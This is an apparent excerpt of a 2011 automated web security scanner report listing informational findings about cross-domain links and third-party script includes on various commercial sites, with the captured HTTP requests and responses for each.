<h3><a href="http://www.mysimon.com/prices/cisco-blkr-svb-100u-1y-spam-and-virus-block-100-us-1yr-blkrsvb100u1y-firewall" onmousedown="return si_T('&amp;ID=SERP,5259.1')">Compare Cisco BLKR-SVB-100U-1Y <strong>
...[SNIP]...
<h3><a href="https://www.clearmymail.com/" onmousedown="return si_T('&amp;ID=SERP,5288.1')"><strong>
...[SNIP]...
<h3><a href="http://15110.r.msn.com/?ld=4vGcSGZFxb0nh5UPBKJIrkEmRuqOxSDB9SWROULan7rF9EpW9-Tk6bIj2K5dtXMINOFsB95w4g0VM__zewxYayzwJbOOGBAxZu2pNdC5nhcLqvoMAG3zQuLoA_Xpoq1kmu5lZcmI5PEYzxYnI7B4DPPdUUTtOSurqwjmndey6GuqeZjBxee1ruapgd6xFfEOh0pr8a3uTwZLXzF2uqOSl9Lk0UTbt_zKUhP345qdZdVUg1VAlMP5FaOqb5otnAuPvktZrW_RAmY3M9vkvkTMnjg2CXYKoHiW4RWT9dwpJDBpYsz_QP3piuZx4" onmousedown="return si_T('&amp;ID=FD,61.1,Ads')">Free <strong>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4vZUFYX_CQa-Dy4HUI_2M2MlLG_evpXynJQALV9o6iyWEz2GhLAc-F8ATH_fKExKDK5RNKTdPz1hVg7LFnBzJ5TJUJYMNiLqAfX6VqYz430jgTCjJVPOwY7D6GQQeUUWFm7OhlYE583gS6wnTlFjLoUmDr2x4sG_7wIezwZDmvw6kmDi14xnNkyCNma9xBWxCNPcQhbLWwuq5tufBBZcIZ6-XLhy0RosiSFISWpzmDQh2kO2qY6UYvV80pyHPV_5hVlb8smY6L6KC8VX2j6NC1xIJ_Qgt_vogmYnCmgOG1u_nYtfmPBPaDRZowPqz2Ob3kNVQJTD4irvh1hQShFkHZMNjlRhsQJmNzPUastlNgccFH83FfAjjlyXTbynvGjKZkaZRFoq1o3h3O" onmousedown="return si_T('&amp;ID=FD,65.1,Ads')">Email <strong>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4vsyf5iRn5bqGx8gGYBEPxlGtMKhoi2rnq8YuzYdHiTGmIm5so66Sh7goVmhb8JwcADaebz6iCtTfWxLPABs0fMT2s8Bmuct9c1BVfwCCHWSW5NPggUGh1LBRjiNGwYG5z0KBWjrG5cMlbsCNmDuH4H2oPxq4iN45vhS1aCectT88ooLqSKXUiX0uP55oIOVPMOjnzgRYjJ6KG9It84dgzjBtlKuF-l6fguJTvXSiLFWLAN8KcTvc-aTwNt5KyDXX6h4HO76sujNwzx-AjDVBEGaGvZirIUVTG20IGqsNdAWqt1RYQtY8go0BxKEa2vG9PNVQJTD98E7O-UH3dYiL069997KwQJmNzPS4OSYP5pM1NpfuywsHZ6gMD8tteI6-hCvCVMOzYXVnb" onmousedown="return si_T('&amp;ID=FD,67.1,Ads')">McAfee Official Site</a>
...[SNIP]...
<h3><a href="http://75294.r.msn.com/?ld=4vvaeUSUQeParC8zwunx4l-LPgKxUJCrqLf-rpTxn7Nj4JnHtckNH01KCLSrBTC-0RI3MaReN0U4yzRhuXfjNVV7rWmf8OWoCumoqPAUtUlXjGswra2yNoJ05uRaElNH1dBO9nyruwI6Cxy18vMYGZ9l9jWCnuBnD-wJZ7X8ceHzCWoxTMIsnG22WdcJUc7MZCW_zMz545lDC_zLrnYi2IB_K57cvcdqVQHyH9t2Kzqw1VZPPXdME1HyrseygXn48pWo_S498L0cDHmkklyb4BtaTkGjD_NwZmaNoqxvTbMmRQnz4WhEEa5bmDtDgqxQx0l7dpgRlFgWqxYsy30vIEJPK_XXcT4WwOEWVtf8yUj88MHJoWsqZo6LSikVcPx2rQPkKa9h8tTRC0JPi-XvIE6A3_1tYdC_zKtwuc_k4ls5h3qszo_EaQkjCQAZLY2uJYNVQJTEIAAa6QAqyLcSFjiKrGBbYQJmNzPXJ3LdBw3wBqS5-qzMDg-jLsa-zZqXcf0YAzQn-KFE0d" onmousedown="return si_T('&amp;ID=FD,69.1,Ads')">AntiVirus Protection</a>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4vhD3Iid52NaEc49huJvnzPo-yPrNeukFZ5vvSpcbc3C3_UoT7s8CW-cpbP6AjLyRyX2tdxyvm3PH68tJlqfUKumXs47TsbTo8GUpcZecPsSj_5GmdL6AdHKDpCNhvZ6wFbNlC0WWPZCg9tQ2K8qeTRSDjtstq-sdnUWsWVtKFL5nhN1M7MQcNQiFmhELgqVUas1GRW6BaE0CMnYLtUMVY9DrCxuXdH8ksXo1RmCrRdHGIm6rHcKVOx3ZwLkjILCONVpEMRWPAKseAkBc-54p5Go11JuzpEd3REFeziK2Z60lqisa01yKl6eW7yVgmmP5EPG2JO2vNDn3ApuHUh-692PQZF1e_AgRmiMyd_0qoaMgm2xTGGdbQHuR7egcqrrbnZSlzWZ6gg9f4RA9tO2dLAjVUCUx_8d3X72ub5D5_RsfwOm4lECZjcz0uQv1mrCngLk7f_Ncn2hAGF4TK8OPQMZAx0WFugqkoHA" onmousedown="return si_T('&amp;ID=FD,71.1,Ads')">Fix <strong>
...[SNIP]...
<h3><a href="http://0.r.msn.com/?ld=4vQhKsVUZvPErMSfpf2FPdSS1n2mRK8KGw4I80QWBL0jd8j5sPFpU-gseoEs3GqsQ2VO-j0hCJWYyzCjHZarohua391t25mIR6rXjbUyZiPrwoU_hosI22woca_HkMooGPBLfZJ4HtI8e0FuTrURkBprgEp-jhNkHJ20FGtA6mCuHWopa-KfwTscGljChIIJl1RWHnbd24TXk7oMzLZHJbSjVUCUx20dgUPgQuMXpuIVpvtsupECZjcz3OCdtPhe__FApqd2Rbok0GK1GRLw64n9d2iUlVCXIPMw" onmousedown="return si_T('&amp;ID=FD,73.1,Ads')">SpamBully - Free Download</a>
...[SNIP]...
<div><a href="http://advertising.microsoft.com/search/" class="sb_adMktA" onmousedown="return si_T('&amp;ID=FD,63.1,Ads')">See your message here</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,106.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,108.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,110.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,112.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,114.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,116.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatweb&amp;P2=spam+virus+block&amp;P3=0&amp;P4=QBRE&amp;P5=B506C07761D7465D924574124E3C14DF&amp;P6=Washington, District Of Columbia&amp;P9=38.906898498%2f-77.028396606&amp;P10=0&amp;P11=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3demail%2bspam%2bvirus%26go%3d%26form%3dQBRE%26qs%3dn%26sk%3d%26sc%3d8-4&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fsearch%3fq%3dspam+virus+block%26go%3d%26qs%3dn%26sk%3d%26sc%3d8-10%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,118.1')">Tell us what you think</a>
...[SNIP]...

20.53. http://www.clone-systems.com/ecommerce/cart.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clone-systems.com
Path:   /ecommerce/cart.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ecommerce/cart.php?suggest=0 HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:56:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 42551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
</script>

   <script language="JavaScript" src="https://seal.networksolutions.com/siteseal/javascript/siteseal.js" type="text/javascript"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" language="javascript" src="//verify.authorize.net/anetseal/seal.js" ></script>
                   <a href="https://www.authorize.net/" id="AuthorizeNetText" target="_blank">Online Payments</a>
...[SNIP]...

20.54. http://www.clone-systems.com/ecommerce/javascript/product.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clone-systems.com
Path:   /ecommerce/javascript/product.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ecommerce/javascript/product.js?1 HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/products/Penetration-Testing-On-Demand.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:56:24 GMT
Server: Apache
Last-Modified: Fri, 18 Dec 2009 02:09:13 GMT
ETag: "20001a-12c1-47af739dae440"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 4801

/**
* All functions have been moved to product.functions.js
* This is because this file was used in the control panel as well as the front end, but the
* below initialization code is only meant for
...[SNIP]...
</param>'
               + '<embed src="http://www.youtube.com/v/' + videoId + '?&fs=1&autoplay=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="320" height="265"></embed>
...[SNIP]...
</param>'
                       + '<embed src="http://www.youtube.com/v/' + videoId + '?&fs=1&autoplay=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"></embed>
...[SNIP]...

20.55. http://www.comodo.com/resources/webinars/e-commerce/pci-compliance-demystified.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comodo.com
Path:   /resources/webinars/e-commerce/pci-compliance-demystified.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /resources/webinars/e-commerce/pci-compliance-demystified.php?gclid=CMO8iMjsuKgCFQ5-5Qodm1pYEg HTTP/1.1
Host: www.comodo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 23:45:13 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=9e713970eaa1e4a66f527fc3b1a40f5c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 58628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<li><a href="//www.comodovision.com" title="Videos">Videos</a>
...[SNIP]...
<li><a href="//www.comodovision.com" title="Videos">Videos</a>
...[SNIP]...
<li><a href="//www.comodovision.com" title="Videos">Videos</a>
...[SNIP]...
<li class="top"><a href="http://www.comodopartners.com/partner/partnerdoc.html" title="Partner Documentation">Partner Documentation</a>
...[SNIP]...
<li><a href="http://www.comodopartners.com/partner/trustlogo.html" title="TrustLogo">TrustLogo</a>
...[SNIP]...
<li><a href="http://www.comodopartners.com/partner/rootkey.html" title="Root Keys">Root Keys</a>
...[SNIP]...
<li><a href="http://www.comodopartners.com/partner/evssl.html" title="Comodo EV SSL">Comodo EV SSL</a>
...[SNIP]...
<div>
       <a href="https://cert.webtrust.org/ViewSeal?id=1082" target="_blank"><img src="/images/ssl-images/webtrust_logo1.gif" alt="Certification Authorities" title="Certification Authorities" /></a>
       <a href="https://cert.webtrust.org/ViewSeal?id=1083" target="_blank"><img src="/images/ssl-images/webtrust_logo2.gif" alt="Certification Authorities" title="Certification Authorities" />
...[SNIP]...
</a>
           <a href="http://www.addthis.com/bookmark.php?v=250&amp;username=xa-4ca0241930358767" class="addthis_button_compact"></a>
       </div>
       <script type="text/javascript" src="//s7.addthis.com/js/250/addthis_widget.js#username=xa-4ca0241930358767"></script>
...[SNIP]...
<li><a href="http://www.comodo.tv" target="_blank" onclick="javascript: pageTracker._trackPageview('/click-track/TXT/Community/ComodoTV/?pagelink=Global-Header');">Comodo TV</a>
...[SNIP]...
<li><a href="http://www.melih.com" target="_blank" onclick="javascript: pageTracker._trackPageview('/click-track/TXT/Community/CEOBlog/?pagelink=Global-Header');">CEO's Blog</a>
...[SNIP]...
<li class="last"><a href="http://www.comodo.cn" title="COMODO CHINA" target="new" onclick="javascript: pageTracker._trackPageview('/click-track/TXT/Comodo-China/?pagelink=Global-Header');">&#20013;&#25991; </a>
...[SNIP]...
</script>
<a href="//www.instantssl.com/" id="comodoTL">Free SSL Certificate</a>
...[SNIP]...

20.56. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110426_0700%26ssh%3DS583531935%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.26.63
X-Cnection: close
Date: Tue, 26 Apr 2011 13:54:02 GMT
Content-Length: 8460

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/nogz-s5wETe.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/I8QAd_a7Pbh.js"></script>
...[SNIP]...

20.57. http://www.genbook.com/bookings/booknowjstag.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.genbook.com
Path:   /bookings/booknowjstag.action

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bookings/booknowjstag.action?id=30134654&bookingSourceId=1000 HTTP/1.1
Host: www.genbook.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:43:48 GMT
Server: Jetty(6.1.21)
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: JSESSIONID=1svklbmve2bqs.cb2;Path=/bookings
X-UA-Compatible: IE=7
Content-Length: 876


var goTimer;
function urchinCheck() {
clearTimeout(goTimer);
try
{
urchinTracker("/booknowtag/30134654");
} catch (e) {
goTimer = window.setTimeout(urchinCheck
...[SNIP]...
</a>' + sWrite)
document.writeln('<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

20.58. http://www.nuclearpesticide.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nuclearpesticide.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?epl=GWxgAxA73QxrLsd2C6qmPnS3ZN9CQuEUyV38MxNtdDzbPO8DkWEHRIZAwJEDpKPH-fRZWF7ASJjVMurhyobiRLm-kN1iK6-u1SwKVBQvmQiJThLEwAFhK8C7kmCnqgZgRKGT6s5H2tSm7aABlEc9EG3U5CmC9DSATFOjTU2bhiJ0ACAQ3ue_AADgfwUAAECAWwkAAN0t2bdZUyZZQTE2aFpChgAAAPA HTTP/1.1
Host: www.nuclearpesticide.com
Proxy-Connection: keep-alive
Referer: http://www.nuclearpesticide.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: parkinglot=1

Response

HTTP/1.0 200 (OK)
Cache-Control: private, no-cache, must-revalidate
Pragma: no-cache
Server: Oversee Turing v1.0.0
Content-Type: text/html
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://www.dsnextgen.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Set-Cookie: nuclearpesticide.com=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1303825557%7Cclick%3A0%7Cblocked%3A0; path=/; expires=Wed, 27-Apr-2011 13:45:58 GMT
Set-Cookie: ident=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1303825557%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Auvzrwspvuywxprvv; path=/; expires=Wed, 27-Apr-2011 13:45:58 GMT
Set-Cookie: Spusr=a0015ac11ef4db6cc951a4c; path=/; expires=Thu, 25-Apr-2013 13:45:58 GMT
Connection: Keep-Alive
Content-Length: 52423

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- turing_cluster_prod -->
<html>
<head> <title> nuclearpesticide.com </title>
<meta http-equiv="Keywords
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<link rel="shortcut icon" href="http://cdn.dsultra.com/favicon/mi_favicon.ico" type="image/x-icon">
<script type="text/javascript">
...[SNIP]...
</script>


<link rel="stylesheet" href="http://cdn.dsultra.com/css/0/landing/en.css" type="text/css">


<link rel="stylesheet" href="http://cdn.dsultra.com/css/782/landing/en.css" type="text/css">

<!-- BOF custom css -->
...[SNIP]...
<span class="footer_privacy_section">
<a href="http://cdn.dsultra.com/t/privacy_ds.htm" target="privacy_nuclearpesticide_com">Privacy Policy</a>
...[SNIP]...
</style>
<SCRIPT TYPE="text/javascript" SRC="http://adserving.cpxadroit.com/tags2/4-1005620.js"></SCRIPT>
...[SNIP]...
</script>

<iframe src='http://domdex.com/f?c=107&k=health insurance coverage' width=0 height=0 frameborder=0></iframe>
...[SNIP]...
</script> <script type="text/javascript" src="http://p.chango.com/p.js"></script>
...[SNIP]...

20.59. http://www.onestoppciscan.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onestoppciscan.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?gclid=CMfRgcnsuKgCFUF95QodS0dhDQ HTTP/1.1
Host: www.onestoppciscan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:45:19 GMT
Server: Apache
Last-Modified: Wed, 27 Jan 2010 19:58:42 GMT
ETag: "df80b7-4b6a-47e2ad4472080"
Accept-Ranges: bytes
Content-Length: 19306
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
       <title>Welcome to Backbone Systems OneStopPCIScan.com</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<span><a target="_blank" href="https://www.pcisecuritystandards.org/security_standards/pci_dss_download.html">PCI's Data Security Standard (PCI DSS)</a>
...[SNIP]...
<li><a target="_blank" href="https://www.pcisecuritystandards.org/security_standards/download.html?id=pci_dss_v1-2.pdf">PCI DSS v1.2</a>
...[SNIP]...
<li><a target="_blank" href="https://www.pcisecuritystandards.org/pdfs/pci_dss_1.2_faqs.pdf">PCI DSS v1.2 FAQ&acute;s</a>
...[SNIP]...
<li><a target="_blank" href="https://www.pcisecuritystandards.org/pdfs/pci_dss_saq_navigating_dss.pdf">Navigating the PCI DSS</a>
...[SNIP]...
<li><a target="_blank" href="https://www.pcisecuritystandards.org/pdfs/pci_ssc_quick_guide.pdf">PCI Quick Reference</a>
...[SNIP]...
<span><a target="_blank" href="http://www.backbonesecurity.com/">Backbone Security</a>
...[SNIP]...
<span><a href="https://www.pcisecuritystandards.org/" target="_blank">Payment Card
Industry's (PCI) Security Standards Council</a>
...[SNIP]...

20.60. http://www.saintcorporation.com/products/saas/webSaintPro.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.saintcorporation.com
Path:   /products/saas/webSaintPro.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /products/saas/webSaintPro.html?gclid=CKeR3cTsuKgCFUNd5Qod6WW7Cw HTTP/1.1
Host: www.saintcorporation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:44:10 GMT
Server: Apache/2.2.15 (Unix)
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 16972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

21. Cross-domain script include  previous  next
There are 74 instances of this issue:


21.1. https://account.snap.com/signup.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.snap.com
Path:   /signup.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /signup.php HTTP/1.1
Host: account.snap.com
Connection: keep-alive
Referer: http://www.snap.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780536; __utma=241625280.1756088163.1303782451.1303782451.1303782451.1; __utmb=241625280; __utmc=241625280; __utmz=241625280.1303782451.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); session=id%3D55022ba0e047fea09f979fd4570d39f9%26time%3D1303782563%26created_time%3D1303782435

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:49:28 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.7d PHP/5.2.8
X-Powered-By: PHP/5.2.8
Set-Cookie: PHPSESSID=fc0f88fb7427f8b35b477dc2f19b745b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 81629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-t
...[SNIP]...
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.2. http://ad.amgdgt.com/ads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.amgdgt.com
Path:   /ads/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ads/?t=i&f=j&p=5112&pl=bb9cfe77&rnd=81239918339997540&clkurl=http://ib.adnxs.com/click/PQrXo3A9DEA9CtejcD0MQBLaci7FlQBApHA9CtcjE0CkcD0K1yMTQFUcOaKahDtdSsYda6b2ziXJ1LZNAAAAAEQwAAC1AAAAlgIAAAIAAADEpAIA0WMAAAEAAABVU0QAVVNEAHgAWAJhDE0AAg0BAgUCAAQAAAAAlx8LKgAAAAA./cnd=!uA56ZAiQmQMQxMkKGAAg0ccBKE0xMzMzEdcjE0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABY4RhgAGiWBQ../referrer=http%3A%2F%2Fwww.spamlaws.com%2Fspam-blocker.html/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBOnjTydS2TfGKEci1sQfR6qWJAdfq-NMBp5-U7Bjrwu3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi01MjUzODA5NDMwOTQwNDEwoAHD8v3sA7IBEHd3dy5zcGFtbGF3cy5jb226AQoxMjB4NjAwX2FzyAEJ2gEpaHR0cDovL3d3dy5zcGFtbGF3cy5jb20vc3BhbS1ibG9ja2VyLmh0bWyYAsobwAIEyAKF0s8KqAMB6AO6AugDigP1AwAAAMSABrqkhf7K9qWnTw%26num%3D1%26sig%3DAGiWqtyey6ImO1eOpu-MUOoG2tgmoZ9